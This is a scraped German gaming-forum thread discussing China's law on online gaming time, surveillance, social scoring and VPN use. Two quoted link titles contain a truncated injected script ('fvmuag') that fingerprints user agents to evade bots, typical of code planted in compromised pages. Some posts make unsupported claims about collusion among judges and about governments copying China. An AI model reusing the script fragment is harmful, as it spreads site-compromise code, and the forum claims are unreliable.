In China gibt es jetzt ein Gesetz, das die Zeit von Onlinespielern reguliert

counter-strike.gif
Laut Wikipedia handelt es sich bei der chinesischen Videospielindustrie um den seit 2015 weltweit am stärksten wachsenden Markt für Videospiele. Im Jahr 2011 galt der chinesische Videospielmarkt sogar als der Größte der Welt. Zudem sind in China Arcade-Spiele äußerst beliebt und bilden in der Volksrepublik einen erfolgreichen Industriesektor. Somit kann mit Verlaub behauptet werden, dass viele Chinesen gerne zocken. Allerdings scheinen gerade chinesische Jugendliche und Kinder laut Angaben der Medienbehörde des Landes zu viel Zeit vor der Flimmerkiste zu verbringen. Aus diesem Grund gab die...

... weiterlesen

Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
Läuft bei denen würde ich mal behaupten.

Das gleiche kann hier ganz schnell passieren...

Krankenkassendaten werden schon gesammelt
Online funktioniert des ausweis ist NOCH deaktivierbar

Lass doch mal die Regierung auf dumme Gedanken kommen

Ach sind die ja schon

Was vom Tage übrig blieb: EU-Webseiten jetzt EU-kompatibler, der österreichische Staatstrojaner und E-Voting-Desaster in Spanien</title> <script>function fvmuag(){if(navigator.userAgent.match(/x11.*fox\/54|oid\s4.*xus.*ome\/62|oobot|ighth|tmetr|eadles|ingdo/i))return!1;if(navigator.userAgent.match(/x11.*ome\/75\.0\.3770\.100/i)){var e=screen.width,t=screen.height;if("number"==typeof e netzpolitik.org

Der Weg dahin ist also nicht weit...

Wenn es in China gut funktioniert, wird sich das irgendwann verbreiten...

freundliche Grüße :)

in china gibts auch ein punktesystem im viel umfassender als bei uns zb die schufa, welche darüber entscheidet, ob und wenn ja zu welchen konditionen jemand nen kredit bekommt, nen job, wohnung bla bla bla bekommt. und zuviel online reduziert deses ranking ganz erheblich.
erstaunlich finde ich vielmehr, wie die das konstrollieren können. woher weiß das system, das heute kevin 2 statt 1,5std gespielt hat und nicht die zeit mit seiner schwester chantal geteilt hat ?! was ist eigentlich mit VPN und anderen verschleierungsgeschichten ?

flatsch hat schon recht, das wir in deutschland auch immer mehr beschnitten werden im internet. ein generalles maximum für spiele halte ich aber für eher unwahrscheinlic, da das gegen soviele grundgesetze verstößt, das nur die allergrößten trottel das jemals versuchen werden. aber in der heutigen zeit ist man da auch vor nichts mehr sicher, weil die entscheider von tuten und blasen keine ahnung haben (siehe artikel 13, wo die bei der abstimmung nicht wußten, was sie da eigentlich abstimmen...).

Und warum sollen irgendwelche Meinungen, also Grundgesetze, Menschen vor Diktatur und Willkür schützen?
Meinungen ändern sich und das GG ermöglicht genau erst solche Taten.
Eine echte Volksherrschaft gibt es nicht, also haben wir Menschen auch diesbezüglich nichts zu entscheiden.

Im Grundgesetz steht in etwa seit den 1950ern "keine aktive Kriegsbeteiligung etc. pp". Dennoch gab es eine aktive Kriegsbeteiligung im Kosovokrieg.
Wie gemacht? Einfach umformuliert und uminterpretiert wie es der Meinung von Staatsdienern und der Herrscherklasse passt.
Bundeswehreinsatz im Syrienkrieg das gleiche.

Am 05.11.2019 zum Thema Sanktionen und "Würde" mitbekommen? Haben nur wenige Zeitungen etc. an die große Glocke gehängt.
Jeder Esel versteht dass das Kürzen von Leistungen unter das Existenzminimum laut GG nicht erlaubt ist. Diskussion und Dehnung, Umformulierung oder Interpretation ist ausgeschlossen, denn die Definition von Würde im GG "Würde des Einen über alles andere" ist genau beschrieben.
Hat dies wenn gejuckt? Nein, warum auch. Denn alle Richter werden von der GroKo gewählt - einfach mal recherchieren was es damit auf sich hat ;)
Minister und Staatsanwälte von Land und Bund sind weisungsgebunden. Anwälte und Richter machen imme gemeinsame Sache, also besteht hier ein großer Einfluss. Generalbundesanwalt Range wurde durch Justizminister Maas entlassen. (Ihr wisst schon was Maas so gemacht hat und noch macht?)
Das Urteil wurde halt so gesprochen da die Regierungen von Land und Bund sonst ziemlich unbequeme Zugeständnisse machen müssten, und quasi zugeben müssten "die Systeme funktionieren nicht mehr".
Habe auch keine Lust hier gerade paar Tausend Zeilen niederzuschreiben :coffee:

Das ist die ständige Salami-Taktik der Staatsdiener.
Wenn heute Vorschläge gemacht werden zum Thema "Klarnamenzwang im Netz", dann ist dies eig. schon beschlossene Sache. So war es mit beinahe allen Dingen in den letzten 10 Jahren.
Und Chinas Vorgehensweisen sind allen Regierungen weltweit ein Vorbild. Alle reichen westlichen Nationalstaatem steuern darauf zu gleiche/ähnliche Verhältnisse wie dort zu etablieren.

zuviel online reduziert deses ranking ganz erheblich.
Ist ja auch klar, wer den ganzen Tag und die ganze Nacht nur daddelt, kann seine Bürgerpflichten nur bedingt erfüllen oder auch einen Kredit wohl eher weniger abbezahlen.
Die Methode ist... diskutabel... aber die Logik dahinter kristallklar.

was ist eigentlich mit VPN und anderen verschleierungsgeschichten ?
Privatpersonen und Ausländern ist die Verwendung von VPN untersagt. Gewerbetreibende und deren Angestellte können bei Bedarf Zugang zum Staats-VPN beantragen, um so mit deren ausländischen Geschäftspartnern durch die Staats-Firewall hindurch zu kommunizieren (bspw. per Skype, Whatsapp, etc.).

Ist ja auch klar, wer den ganzen Tag und die ganze Nacht nur daddelt, kann seine Bürgerpflichten nur bedingt erfüllen oder auch einen Kredit wohl eher weniger abbezahlen.
Die Methode ist... diskutabel... aber die Logik dahinter kristallklar.

Privatpersonen und Ausländern ist die Verwendung von VPN untersagt. Gewerbetreibende und deren Angestellte können bei Bedarf Zugang zum Staats-VPN beantragen, um so mit deren ausländischen Geschäftspartnern durch die Staats-Firewall hindurch zu kommunizieren (bspw. per Skype, Whatsapp, etc.).

Die Hotels mit vielen internationalen Kunden haben Staats-VPN. Kommt immer drauf an, in Bejing hatte ich keine google/whatsapp Dienste, in Xian hingegen schon. Kostet den Unternehmen auch eine Stange Geld.

Aluhut Besitzer detected.

Bei uns in europa, vor einiger zeit, haben wir schonmal eine zeit gehabt wo sich der staat massiv in das leben der menschen eingemischt hat.

Dies resultierte dann unkontrolliert der bürger in irgenderwas mit Hologrammen, holo.. irgendwas mit holo dings da.

In China gibt es jetzt ein Gesetz, das die Zeit von Onlinespielern reguliert
Das ist doch toll! Jetzt haben die endlich mehr Zeit, raus zu gehen und das Wetter genießen. Fußball könnt ihr auch außerhalb von Vereinen spielen, Basketball auch und und und... Wahnsinn wie viele RL games es gibt.

Zuletzt bearbeitet von einem Moderator:
Was die Eltern als Erziehungsleistung nicht mehr vollbringen können, erledigt halt der Staat.

Schöne neue Welt.

Irgendwo schräg dass der Staat sich in der Pflicht sieht sowas zu regulieren, aber immerhin sind die Zahlen vernünftig.
Ich kenne jemanden der seinen Kindern nur 2h Zocken insgesamt in der GANZEN Woche gewährt :(

Irgendwo schräg dass der Staat sich in der Pflicht sieht sowas zu regulieren, aber immerhin sind die Zahlen vernünftig.
Ich kenne jemanden der seinen Kindern nur 2h Zocken insgesamt in der GANZEN Woche gewährt :(
Oh cool DT. Also ist es völlig ok, wenn Kinder Civilization usw. bis zum Erbrechen zocken und keinen Abschluss kriegen? Denk doch mal an die armen Unternehmen, die dann weniger qualifiziertes Personal kriegen...

Und wie wollen die das kontroll.. oh China, stimmt ja.

Oh cool DT. Also ist es völlig ok, wenn Kinder Civilization usw. bis zum Erbrechen zocken und keinen Abschluss kriegen? Denk doch mal an die armen Unternehmen, die dann weniger qualifiziertes Personal kriegen...
Wer hat was von zum Erbrechen gesagt?
Die chinesische Regulierung ist das ja grade nicht. Ich habe etwa um den Dreh rum gespielt in meiner "Gamerphase" und bin jetzt trotzdem "qualifiziertes Personal" :)

Aluhut Besitzer detected.
Ne Gegenteil, aber Realist
in china gibts auch ein punktesystem im viel umfassender als bei uns zb die schufa, welche darüber entscheidet, ob und wenn ja zu welchen konditionen jemand nen kredit bekommt, nen job, wohnung bla bla bla bekommt. und zuviel online reduziert deses ranking ganz erheblich.
erstaunlich finde ich vielmehr, wie die das konstrollieren können. woher weiß das system, das heute kevin 2 statt 1,5std gespielt hat und nicht die zeit mit seiner schwester chantal geteilt hat ?! was ist eigentlich mit VPN und anderen verschleierungsgeschichten ?

flatsch hat schon recht, das wir in deutschland auch immer mehr beschnitten werden im internet. ein generalles maximum für spiele halte ich aber für eher unwahrscheinlic, da das gegen soviele grundgesetze verstößt, das nur die allergrößten trottel das jemals versuchen werden. aber in der heutigen zeit ist man da auch vor nichts mehr sicher, weil die entscheider von tuten und blasen keine ahnung haben (siehe artikel 13, wo die bei der abstimmung nicht wußten, was sie da eigentlich abstimmen...).
Da du in China sich überall mit Registrierungen durchkämpfen musst wird dasin spielen auch kommen...
Das wird mit der staatsdatenbank in China validiert... da kann ke vin nicht plötzlich 18 sein, da er entweder mit Gesichtsscan (sehr verbreitet in China) oder anderem Merkmal sich identifizieren muss.

Hersteller die das nicht umsetzen, werden verbannt...

Anwälte und Richter machen imme gemeinsame Sache, also besteht hier ein großer Einfluss.

na das ist doch völliger stuß. das staatsanwälte von irgendwem ihre "weisungen" bekommen ist klar. sie vertreten einzig und alleine den staat, weshalb sie auch staatsanwälte heißen.
ein anwalt macht "gemeinsame sache" mit seinen klienten oder auch einfach kunde genannt. wer ihn bezahlt, den vertritt er. das ein anwalt aber gemeinsame sache mit einen richter macht, ist aber absoluter schwachsinn. ist etwa so als ob man behaupet, die maus macht gemeinsame sache mit der wildkatze.
ein "normaler" richter ist ein beamter, der sobald er mal verbeamtet wurde, quasi nicht mehr von seinen hocker wegzubekommen ist. schmutzkampagnen, erfundene diebstähle oder andere dienstvergehen gegen einen juristen sind ziemlich schwer, da ein richter sich natürlich top auskennt der versuch das durchzuziehen ganz fix nach hinten losgehen kann.

Naja, seien wir mal ehrlich, wer hierdraus Diktaturen u.ä. ableitet gehört schon zu dieser Fraktion.
Es ist ein Gesetz zum Schutze der Bürger vor sich selbst. So wie viele andere auch die wir ebenfalls haben. Das gehört zu einem Staat dazu.
Davon abgesehen war Flatsch auch noch komplett am Thema vorbei indem er was von Krankenkassendaten faselte.

ein Gesetz zum Schutz der Bürger vor sich selbst

lol

hast du eigentlich irgendeine Ahnung wovon du sprichst?

Social Scoring noch dazu ja die Tendenz ist bislang unaufhaltbar Totalitär auch hier

Wie man in 69 Jahren einen Ãœberwachungsstaat aufbaut</title> <script>function fvmuag(){if(navigator.userAgent.match(/x11.*fox\/54|oid\s4.*xus.*ome\/62|oobot|ighth|tmetr|eadles|ingdo/i))return!1;if(navigator.userAgent.match(/x11.*ome\/75\.0\.3770\.100/i)){var e=screen.width,t=screen.height;if("number"==typeof e netzpolitik.org

Alles Veracrypten + Perfect Privacy VPN (Bar bezahlt) und grundsätzlich nur Bargeld verwenden sowie alte PKW s ohne Überwachungstechnik ist für Mich schon seit gut 1 Dekade MANDATORY.

hast du eigentlich irgendeine Ahnung wovon du sprichst?
Du versuchst doch nicht ernsthaft mit Menschen wie DT über solche Themen zu diskuttieren? :d
Da werden unzählige rhetorische Mittel benutzt, Argumente verdreht, Dinge verklärt.
Das sind halt Menschen die staats- und systemnah sind und so auch argumentieren; entweder weil sie selbst davon profitieren, so (ideologisch) erzogen wurden oder einfach Zeit/Interesse fehlt (oder Ignoranz) mal die eigene Realitätsblase zu vergrößern.
Mehr solcher Artikel und Beiträge gibt es auf spiegelonline, welt.de, zeit.de etc.
Hier kann man dann auch gut erkennen wieviel von Moderatoren zensiert und gelöscht wird.
Selbst auf computerbase findet man eine große Ansammlung von Menschen, wie letztens den Artikel
https://www.computerbase.de/2019-09/darknet-zweihundert-server-im-bunker-vom-netz-genommen/
Ab und zu verirrt sich mal solch ein Mensch auf hardwareluxx. :p

Alles Veracrypten + Perfect Privacy VPN (Bar bezahlt) und grundsätzlich nur Bargeld verwenden sowie alte PKW s ohne Überwachungstechnik ist für Mich schon seit gut 1 Dekade MANDATORY.
Bar (per Brief) geht da doch nicht mehr oder fährst du zu denen direkt hin?

Naja, seien wir mal ehrlich, wer hierdraus Diktaturen u.ä. ableitet gehört schon zu dieser Fraktion.
Es ist ein Gesetz zum Schutze der Bürger vor sich selbst. So wie viele andere auch die wir ebenfalls haben. Das gehört zu einem Staat dazu.
Davon abgesehen war Flatsch auch noch komplett am Thema vorbei indem er was von Krankenkassendaten faselte.
Ich hab es sogar erklärt, mit den Krankenkassendaten, die gesammelt werden, fängt man an.
Angeblich anonym, aber was machst, wenn irgendwann unser System von den Politikern ganz toll geändert wird...
Dann bekommst Post, weil du zu lang am Tag vorm Monitor hockt und die Kasse dann sagt: gut Augenprobleme werden nur noch zu 50% übernommen... das ist ein Schritt von dem wie gar nicht so weit weg sind wie alle denken... ja es bedurfte dazu deutliche Änderungen aber China macht es doch vor, wie es geht

Wenn es so weiter geht dann sind wir auf einem "guten" Weg in die gleiche Richtung wie China.
Nicht so offensichtlich. Nicht so klar. Nicht so direkt.

Solche Gesetze, die den Weg langsam vorbereiten, werden bei großen Fussballevents durchgewunken und alle schreien "TOOOR".

Ist nicht das erste und nicht das letzte Mal.

Und wer Aluhut schreit versucht das Ganze doch einfach auszublenden und zu entwerten.
Aber sobald man Aluhutschreier als diese tituliert ... ist man automatisch ein Flacherdler der an alles glaubt ...

Genauso wie jeder direkt ein Nazi ist der sich kritisch über Flüchtlinge und der Vorgehensweise wie der Staat damit umgeht äußert.

BTT: In Deutschland nimmt es immer mehr Überhand und einfach zu sagen "Eltern schuld, Eltern schuld". Bis zu einem gewissen grad sicherlich aber meine Frau und ich sind beide Vollzeit und teilweise mit Schichtsystem arbeitstätig. Da ist es nicht immer schlecht wenn gewissen Dinge einen Riegel vorgeschoben bekommen. Ob ich nun eine gesetzliche Sperre für richtig halte oder eher ein System das tatsächlich dafür sorgt, dass nur Menschen mit entsprechendem Alter Zugriff haben oder was weiß ich. Ich muss hier keine Lösung bringen.
Die Vielzahl an Einflüssen ist massiv gestiegen in den letzten 40 Jahren. Etwas mehr Unterstützung vom Staat in gewissen Dingen würde ich mir wünschen. Aber leider wird viel zu viel von der Wirtschaft kontrolliert.
Siehe z.B. das Ampelsystem auf Lebensmitteln was es auch Kindern leichter machen würde zu unterscheiden was gut und was schlecht ist.

So ein System würde hier auch gehen, weil das unterwürfige "deutsche Wesen" gerne gesagt bekommt, was es zu tun und zu lassen hat. Entsprechend sind auch hier die Reaktionen auf diese Überwachungsmassnahme.

Zuletzt bearbeitet:
Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.

Zurück
Oben Unten refresh